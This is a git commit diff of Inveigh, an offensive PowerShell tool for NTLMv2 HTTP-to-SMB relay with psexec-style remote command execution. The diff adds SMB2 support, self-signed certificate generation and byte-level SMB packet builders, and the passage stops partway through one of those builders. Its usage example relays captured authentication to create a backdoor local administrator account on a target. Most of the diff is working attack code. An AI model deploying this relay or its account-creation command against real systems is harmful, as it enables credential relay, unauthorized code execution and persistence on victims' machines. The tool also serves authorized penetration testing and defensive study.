aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorKevin Robertson <robertsonk@gmail.com>2017-01-16 22:47:14 -0500
committerKevin Robertson <robertsonk@gmail.com>2017-01-16 22:47:14 -0500
commit4ec48bad98135e578c91c30e9cee0bf2cbce36d8 (patch)
treeddd12913284b31dd2fe885ddbffbe23defa558f2
parentdb4462655f063725ba167e02f5ff7f15343dbff6 (diff)
downloadInveigh-4ec48bad98135e578c91c30e9cee0bf2cbce36d8.tar.gz
Inveigh-4ec48bad98135e578c91c30e9cee0bf2cbce36d8.zip
Early 1.3 versions
Invoke-InveighRelay refactor - added SMB2 support and switched to an HTTP listener that does not require admin access. Admin access is still required if installing a cert for HTTPS. Note that the system running Invoke-InveighRelay can be targeted for privesc.
Diffstat
-rw-r--r--Scripts/Inveigh-Relay.ps12985
-rw-r--r--Scripts/Inveigh-Unprivileged.ps1181
-rw-r--r--Scripts/Inveigh.ps1406
-rw-r--r--inveigh.pfxbin2493 -> 0 bytes
4 files changed, 2621 insertions, 951 deletions
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index f766b71..b7f687b 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -5,28 +5,49 @@ function Invoke-InveighRelay
Invoke-InveighRelay performs NTLMv2 HTTP to SMB relay with psexec style command execution.
.DESCRIPTION
-Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB relay with psexec style command execution.
+Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB1/SMB2 relay with psexec style command execution.
HTTP/HTTPS to SMB NTLMv2 relay with granular control
+ Supports SMB1 and SMB2 targets
+ Does not require priveleged access on the Invoke-InveighRelay host
+ The Invoke-InveighRelay host can be targeted for privilege escalation
NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
Granular control of console and file output
- Can be executed as either a standalone function or through Invoke-Inveigh
+
+.PARAMETER Command
+Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
+
+.PARAMETER Target
+IP address of system to target for SMB relay.
+
+.PARAMETER Service
+Default = 20 Character Random: Name of the service to create and delete on the target.
.PARAMETER HTTP
Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
+.PARAMETER HTTPIP
+Default = Any: IP address for the HTTP/HTTPS listener.
+
+.PARAMETER HTTPPort
+Default = 80: TCP port for the HTTP listener.
+
.PARAMETER HTTPS
Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
-the local store and attached to port 443. If the script does not exit gracefully, execute
-"netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal"
-in the cert store.
+the local store and attached to port 443. If the script does not exit gracefully, manually remove the certificate.
+This feature requires local administrator access.
+
+.PARAMETER HTTPSPort
+Default = 443: TCP port for the HTTPS listener.
+
+.PARAMETER HTTPSCertIssuer
+Default = Inveigh: The issuer field for the cert that will be installed for HTTPS.
-.PARAMETER HTTPSCertAppID
-Valid application GUID for use with the ceriticate.
+.PARAMETER HTTPSCertSubject
+Default = localhost: The subject field for the cert that will be installed for HTTPS.
-.PARAMETER HTTPSCertThumbprint
-Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current
-working directory and named Inveigh.pfx.
+.PARAMETER HTTPSForceCertDelete
+Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject.
.PARAMETER Challenge
Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
@@ -40,24 +61,14 @@ Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response capture
Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
Anonymous can prevent browser login prompts.
-.PARAMETER SMBRelayTarget
-IP address of system to target for SMB relay.
-
-.PARAMETER SMBRelayCommand
-Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
-
-.PARAMETER SMBRelayUsernames
+.PARAMETER Usernames
Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
domain\username format.
-.PARAMETER SMBRelayAutoDisable
+.PARAMETER RelayAutoDisable
Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on
target.
-.PARAMETER SMBRelayNetworkTimeout
-Default = No Timeout: (Integer) Duration in seconds that Inveigh will wait for a reply from the SMB relay target
-after each packet is sent.
-
.PARAMETER ConsoleOutput
Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
ensure that it doesn't hang the shell.
@@ -80,6 +91,13 @@ enabled.
.PARAMETER RunTime
(Integer) Run time duration in minutes.
+.PARAMETER SMB1
+(Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the
+target.
+
+.PARAMETER StartupChecks
+Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
+
.PARAMETER ShowHelp
Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
@@ -90,9 +108,7 @@ PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and
.EXAMPLE
Invoke-Inveigh -HTTP N
-Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add"
-Perform SMB relay with a command that will create a local administrator account on the SMB relay
-target.
+Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Winter2017 /add && net localgroup administrators Inveigh /add"
.LINK
https://github.com/Kevin-Robertson/Inveigh
@@ -104,45 +120,37 @@ param
(
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
[parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM",
[parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
- [parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget = "",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
- [parameter(Mandatory=$false)][Array]$SMBRelayUsernames = "",
- [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout = "",
+ [parameter(Mandatory=$false)][Array]$Usernames = "",
+ [parameter(Mandatory=$false)][Int]$HTTPPort = "80",
+ [parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
[parameter(Mandatory=$false)][Int]$RunTime = "",
- [parameter(Mandatory=$true)][String]$SMBRelayCommand = "",
- [parameter(Mandatory=$false)][String]$HTTPSCertAppID = "00112233-4455-6677-8899-AABBCCDDEEFF",
- [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint = "98c1d54840c5c12ced710758b6ee56cc62fa1f0d",
+ [parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh",
+ [parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost",
+ [parameter(Mandatory=$false)][String]$Service,
+ [parameter(Mandatory=$true)][String]$Command = "",
+ [parameter(Mandatory=$true)][String]$Target = "",
+ [parameter(Mandatory=$false)][Switch]$SMB1,
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
if ($invalid_parameter)
{
- throw "$($invalid_parameter) is not a valid parameter."
-}
-
-if($inveigh.HTTP -or $inveigh.HTTPS)
-{
- throw "You must stop stop other Inveigh HTTP/HTTPS listeners before running this module."
-}
-
-if(!$SMBRelayTarget)
-{
- throw "You must specify an -SMBRelayTarget if enabling -SMBRelay"
-}
-
-if(!$SMBRelayCommand)
-{
- throw "You must specify an -SMBRelayCommand if enabling -SMBRelay"
+ Write-Output "Error:$($invalid_parameter) is not a valid parameter."
+ throw
}
if(!$OutputDir)
@@ -168,10 +176,10 @@ if(!$inveigh)
$inveigh.valid_host_list = New-Object System.Collections.ArrayList
}
-if($inveigh.HTTP_listener.IsListening -and !$inveigh.running)
+if($inveigh.relay_running)
{
- $inveigh.HTTP_listener.Stop()
- $inveigh.HTTP_listener.Close()
+ Write-Output "Error:Invoke-InveighRelay is already running, use Stop-Inveigh"
+ throw
}
if(!$inveigh.running -or !$inveigh.unprivileged_running)
@@ -183,11 +191,11 @@ if(!$inveigh.running -or !$inveigh.unprivileged_running)
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
- $inveigh.certificate_application_ID = $HTTPSCertAppID
- $inveigh.certificate_thumbprint = $HTTPSCertThumbprint
$inveigh.console_output = $false
$inveigh.console_input = $true
$inveigh.file_output = $false
+ $inveigh.HTTPS_existing_certificate = $false
+ $inveigh.HTTPS_force_certificate_delete = $false
$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
@@ -195,7 +203,6 @@ if(!$inveigh.running -or !$inveigh.unprivileged_running)
}
$inveigh.relay_running = $true
-$inveigh.SMB_relay_active_step = 0
$inveigh.SMB_relay = $true
if($StatusOutput -eq 'Y')
@@ -242,7 +249,10 @@ else
$inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null
-$firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
+if($StartupChecks -eq 'Y')
+{
+ $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
+}
if($firewall_status)
{
@@ -260,17 +270,31 @@ if($firewall_status)
if($HTTP -eq 'Y')
{
- $HTTP_port_check = netstat -anp TCP | findstr 0.0.0.0:80
+ if($StartupChecks -eq 'Y')
+ {
+ $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort "
+ }
if($HTTP_port_check)
{
+ $HTTP = "N"
$inveigh.HTTP = $false
- $inveigh.status_queue.Add("HTTP Capture/Relay Disabled Due To In Use Port 80") > $null
+ $inveigh.status_queue.Add("HTTP Capture/Relay Disabled Due To In Use Port $HTTPPort") > $null
}
else
{
$inveigh.HTTP = $true
$inveigh.status_queue.Add("HTTP Capture/Relay = Enabled") > $null
+
+ if($HTTPIP)
+ {
+ $inveigh.status_queue.Add("HTTP IP Address = $HTTPIP") > $null
+ }
+
+ if($HTTPPort -ne 80)
+ {
+ $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null
+ }
}
}
@@ -283,37 +307,87 @@ else
if($HTTPS -eq 'Y')
{
- $HTTPS_port_check = netstat -anp TCP | findstr 0.0.0.0:443
+ if($StartupChecks -eq 'Y')
+ {
+ $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPSPort "
+ }
if($HTTPS_port_check)
{
- $inveigh.HTTP = $true
- $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To In Use Port 443") > $null
+ $HTTPS = "N"
+ $inveigh.HTTPS = $false
+ $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To In Use Port $HTTPSPort") > $null
}
else
{
try
{
- $inveigh.HTTPS = $true
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2
- $certificate.Import($PWD.Path + "\Inveigh.pfx")
- $certificate_store.Add($certificate)
- $certificate_store.Close()
- $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint
- $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}"
- $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID)
- & "netsh" $netsh_arguments > $null
- $inveigh.status_queue.Add("HTTPS Capture/Relay = Enabled") > $null
+ $inveigh.certificate_issuer = $HTTPSCertIssuer
+ $inveigh.certificate_CN = $HTTPSCertSubject
+ $inveigh.status_queue.Add("HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null
+ $inveigh.status_queue.Add("HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null
+ $certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
+
+ if(!$certificate_check)
+ {
+ # credit to subTee for cert creation code https://github.com/subTee/Interceptor
+ $certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
+ $certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
+ $certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
+ $certificate_issuer_distinguished_name.Encode("CN=" + $inveigh.certificate_issuer, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
+ $certificate_key = new-object -com "X509Enrollment.CX509PrivateKey"
+ $certificate_key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider"
+ $certificate_key.KeySpec = 2
+ $certificate_key.Length = 2048
+ $certificate_key.MachineContext = 1
+ $certificate_key.Create()
+ $certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId"
+ $certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1")
+ $certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1"
+ $certificate_enhanced_key_usage_OID.add($certificate_server_auth_OID)
+ $certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage"
+ $certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID)
+ $certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate"
+ $certificate.InitializeFromPrivateKey(2,$certificate_key,"")
+ $certificate.Subject = $certificate_distinguished_name
+ $certificate.Issuer = $certificate_issuer_distinguished_name
+ $certificate.NotBefore = (get-date).AddDays(-271)
+ $certificate.NotAfter = $certificate.NotBefore.AddDays(824)
+ $certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId
+ $certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256")
+ $certificate.HashAlgorithm = $certificate_hash_algorithm_OID
+ $certificate.X509Extensions.Add($certificate_enhanced_key_usage_extension)
+ $certificate_basic_constraints = new-object -com "X509Enrollment.CX509ExtensionBasicConstraints"
+ $certificate_basic_constraints.InitializeEncode("true",1)
+ $certificate.X509Extensions.Add($certificate_basic_constraints)
+ $certificate.Encode()
+ $certificate_enrollment = new-object -com "X509Enrollment.CX509Enrollment"
+ $certificate_enrollment.InitializeFromRequest($certificate)
+ $certificate_data = $certificate_enrollment.CreateRequest(0)
+ $certificate_enrollment.InstallResponse(2,$certificate_data,0,"")
+ $inveigh.certificate = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -match $inveigh.certificate_issuer})
+ $inveigh.HTTPS = $true
+ $inveigh.status_queue.Add("HTTPS Capture/Relay = Enabled") > $null
+ }
+ else
+ {
+
+ if($HTTPSForceCertDelete -eq 'Y')
+ {
+ $inveigh.HTTPS_force_certificate_delete = $true
+ }
+
+ $inveigh.HTTPS_existing_certificate = $true
+ $inveigh.status_queue.Add("HTTPS Capture = Using Existing Certificate") > $null
+ }
+
}
catch
{
- $certificate_store.Close()
- $HTTPS="N"
+ $HTTPS = "N"
$inveigh.HTTPS = $false
- $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To Certificate Install Error") > $null
+ $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To Certificate Error") > $null
}
}
@@ -324,7 +398,7 @@ else
$inveigh.status_queue.Add("HTTPS Capture/Relay = Disabled") > $null
}
-if($inveigh.HTTP -or $inveigh.HTTPS)
+if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
{
if($Challenge)
@@ -346,34 +420,40 @@ if($inveigh.HTTP -or $inveigh.HTTPS)
}
-$inveigh.status_queue.Add("SMB Relay Target = $SMBRelayTarget") > $null
+$inveigh.status_queue.Add("Relay Target = $Target") > $null
-if($SMBRelayUsernames)
+if($Usernames)
{
- if($SMBRelayUsernames.Count -eq 1)
+ if($Usernames.Count -eq 1)
{
- $inveigh.status_queue.Add("SMB Relay Username = " + ($SMBRelayUsernames -join ",")) > $null
+ $inveigh.status_queue.Add("Relay Username = " + ($Usernames -join ",")) > $null
}
else
{
- $inveigh.status_queue.Add("SMB Relay Usernames = " + ($SMBRelayUsernames -join ",")) > $null
+ $inveigh.status_queue.Add("Relay Usernames = " + ($Usernames -join ",")) > $null
}
}
-if($SMBRelayAutoDisable -eq 'Y')
+if($RelayAutoDisable -eq 'Y')
{
- $inveigh.status_queue.Add("SMB Relay Auto Disable = Enabled") > $null
+ $inveigh.status_queue.Add("Relay Auto Disable = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("SMB Relay Auto Disable = Disabled") > $null
+ $inveigh.status_queue.Add("Relay Auto Disable = Disabled") > $null
}
-if($SMBRelayNetworkTimeout)
+if($Service)
{
- $inveigh.status_queue.Add("SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds") > $null
+ $inveigh.status_queue.Add("Relay Service = $Service") > $null
+}
+
+if($SMB1)
+{
+ $inveigh.status_queue.Add("SMB Version = SMB1") > $null
+ $SMB_version = 'SMB1'
}
if($ConsoleOutput -eq 'Y')
@@ -526,6 +606,744 @@ $shared_basic_functions_scriptblock =
}
+# Irkin functions ScriptBlock
+$irkin_functions_scriptblock =
+{
+ function ConvertFrom-PacketOrderedDictionary
+ {
+ param($packet_ordered_dictionary)
+
+ ForEach($field in $packet_ordered_dictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+ }
+
+ #NetBIOS
+
+ function Get-PacketNetBIOSSessionService()
+ {
+ param([Int]$packet_header_length,[Int]$packet_data_length)
+
+ [Byte[]]$packet_netbios_session_service_length = [System.BitConverter]::GetBytes($packet_header_length + $packet_data_length)
+ $packet_NetBIOS_session_service_length = $packet_netbios_session_service_length[2..0]
+
+ $packet_NetBIOSSessionService = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Message_Type",[Byte[]](0x00))
+ $packet_NetBIOSSessionService.Add("NetBIOSSessionService_Length",[Byte[]]($packet_netbios_session_service_length))
+
+ return $packet_NetBIOSSessionService
+ }
+
+ #SMB1
+
+ function Get-PacketSMBHeader()
+ {
+ param([Byte[]]$packet_command,[Byte[]]$packet_flags,[Byte[]]$packet_flags2,[Byte[]]$packet_tree_ID,[Byte[]]$packet_process_ID,[Byte[]]$packet_user_ID)
+
+ $packet_SMBHeader = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBHeader.Add("SMBHeader_Protocol",[Byte[]](0xff,0x53,0x4d,0x42))
+ $packet_SMBHeader.Add("SMBHeader_Command",$packet_command)
+ $packet_SMBHeader.Add("SMBHeader_ErrorClass",[Byte[]](0x00))
+ $packet_SMBHeader.Add("SMBHeader_Reserved",[Byte[]](0x00))
+ $packet_SMBHeader.Add("SMBHeader_ErrorCode",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("SMBHeader_Flags",$packet_flags)
+ $packet_SMBHeader.Add("SMBHeader_Flags2",$packet_flags2)
+ $packet_SMBHeader.Add("SMBHeader_ProcessIDHigh",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("SMBHeader_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMBHeader.Add("SMBHeader_Reserved2",[Byte[]](0x00,0x00))
+ $packet_SMBHeader.Add("SMBHeader_TreeID",$packet_tree_ID)
+ $packet_SMBHeader.Add("SMBHeader_ProcessID",$packet_process_ID)
+ $packet_SMBHeader.Add("SMBHeader_UserID",$packet_user_ID)
+ $packet_SMBHeader.Add("SMBHeader_MultiplexID",[Byte[]](0x00,0x00))
+
+ return $packet_SMBHeader
+ }
+
+ function Get-PacketSMBNegotiateProtocolRequest()
+ {
+ param([String]$packet_version)
+
+ if($packet_version -eq 'SMB1')
+ {
+ [Byte[]]$packet_byte_count = 0x0c,0x00
+ }
+ else
+ {
+ [Byte[]]$packet_byte_count = 0x22,0x00
+ }
+
+ $packet_SMBNegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_WordCount",[Byte[]](0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_ByteCount",$packet_byte_count)
+ $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name",[Byte[]](0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00))
+
+ if($packet_version -ne 'SMB1')
+ {
+ $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat2",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name2",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x30,0x30,0x32,0x00))
+ $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_BufferFormat3",[Byte[]](0x02))
+ $packet_SMBNegotiateProtocolRequest.Add("SMBNegotiateProtocolRequest_RequestedDialects_Dialect_Name3",[Byte[]](0x53,0x4d,0x42,0x20,0x32,0x2e,0x3f,0x3f,0x3f,0x00))
+ }
+
+ return $packet_SMBNegotiateProtocolRequest
+ }
+
+ function Get-PacketSMBSessionSetupAndXRequest()
+ {
+ param([Byte[]]$packet_security_blob)
+
+ [Byte[]]$packet_byte_count = [System.BitConverter]::GetBytes($packet_security_blob.Length)
+ $packet_byte_count = $packet_byte_count[0,1]
+ [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length + 5)
+ $packet_security_blob_length = $packet_security_blob_length[0,1]
+
+ $packet_SMBSessionSetupAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_WordCount",[Byte[]](0x0c))
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXCommand",[Byte[]](0xff))
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved",[Byte[]](0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxBuffer",[Byte[]](0xff,0xff))
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_MaxMpxCount",[Byte[]](0x02,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_VCNumber",[Byte[]](0x01,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SessionKey",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlobLength",$packet_byte_count)
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Reserved2",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_Capabilities",[Byte[]](0x44,0x00,0x00,0x80))
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_ByteCount",$packet_security_blob_length)
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_SecurityBlob",$packet_security_blob)
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeOS",[Byte[]](0x00,0x00,0x00))
+ $packet_SMBSessionSetupAndXRequest.Add("SMBSessionSetupAndXRequest_NativeLANManage",[Byte[]](0x00,0x00))
+
+ return $packet_SMBSessionSetupAndXRequest
+ }
+
+ function Get-PacketSMBTreeConnectAndXRequest()
+ {
+ param([Byte[]]$packet_path)
+
+ [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length + 7)
+ $packet_path_length = $packet_path_length[0,1]
+
+ $packet_SMBTreeConnectAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_WordCount",[Byte[]](0x04))
+ $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXCommand",[Byte[]](0xff))
+ $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Reserved",[Byte[]](0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Flags",[Byte[]](0x00,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_PasswordLength",[Byte[]](0x01,0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_ByteCount",$packet_path_length)
+ $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Password",[Byte[]](0x00))
+ $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Tree",$packet_path)
+ $packet_SMBTreeConnectAndXRequest.Add("SMBTreeConnectAndXRequest_Service",[Byte[]](0x3f,0x3f,0x3f,0x3f,0x3f,0x00))
+
+ return $packet_SMBTreeConnectAndXRequest
+ }
+
+ function Get-PacketSMBNTCreateAndXRequest()
+ {
+ param([Byte[]]$packet_named_pipe)
+
+ [Byte[]]$packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length)
+ $packet_named_pipe_length = $packet_named_pipe_length[0,1]
+ [Byte[]]$packet_file_name_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length - 1)
+ $packet_file_name_length = $packet_file_name_length[0,1]
+
+ $packet_SMBNTCreateAndXRequest = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_WordCount",[Byte[]](0x18))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXCommand",[Byte[]](0xff))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AndXOffset",[Byte[]](0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Reserved2",[Byte[]](0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileNameLen",$packet_file_name_length)
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateFlags",[Byte[]](0x16,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_RootFID",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AccessMask",[Byte[]](0x00,0x00,0x00,0x02))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_AllocationSize",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_FileAttributes",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_ShareAccess",[Byte[]](0x07,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Disposition",[Byte[]](0x01,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_CreateOptions",[Byte[]](0x00,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_Impersonation",[Byte[]](0x02,0x00,0x00,0x00))
+ $packet_SMBNTCreateAndXRequest.Add("SMBNTCreateAndXRequest_SecurityFlags",[Byte[]](0x00))
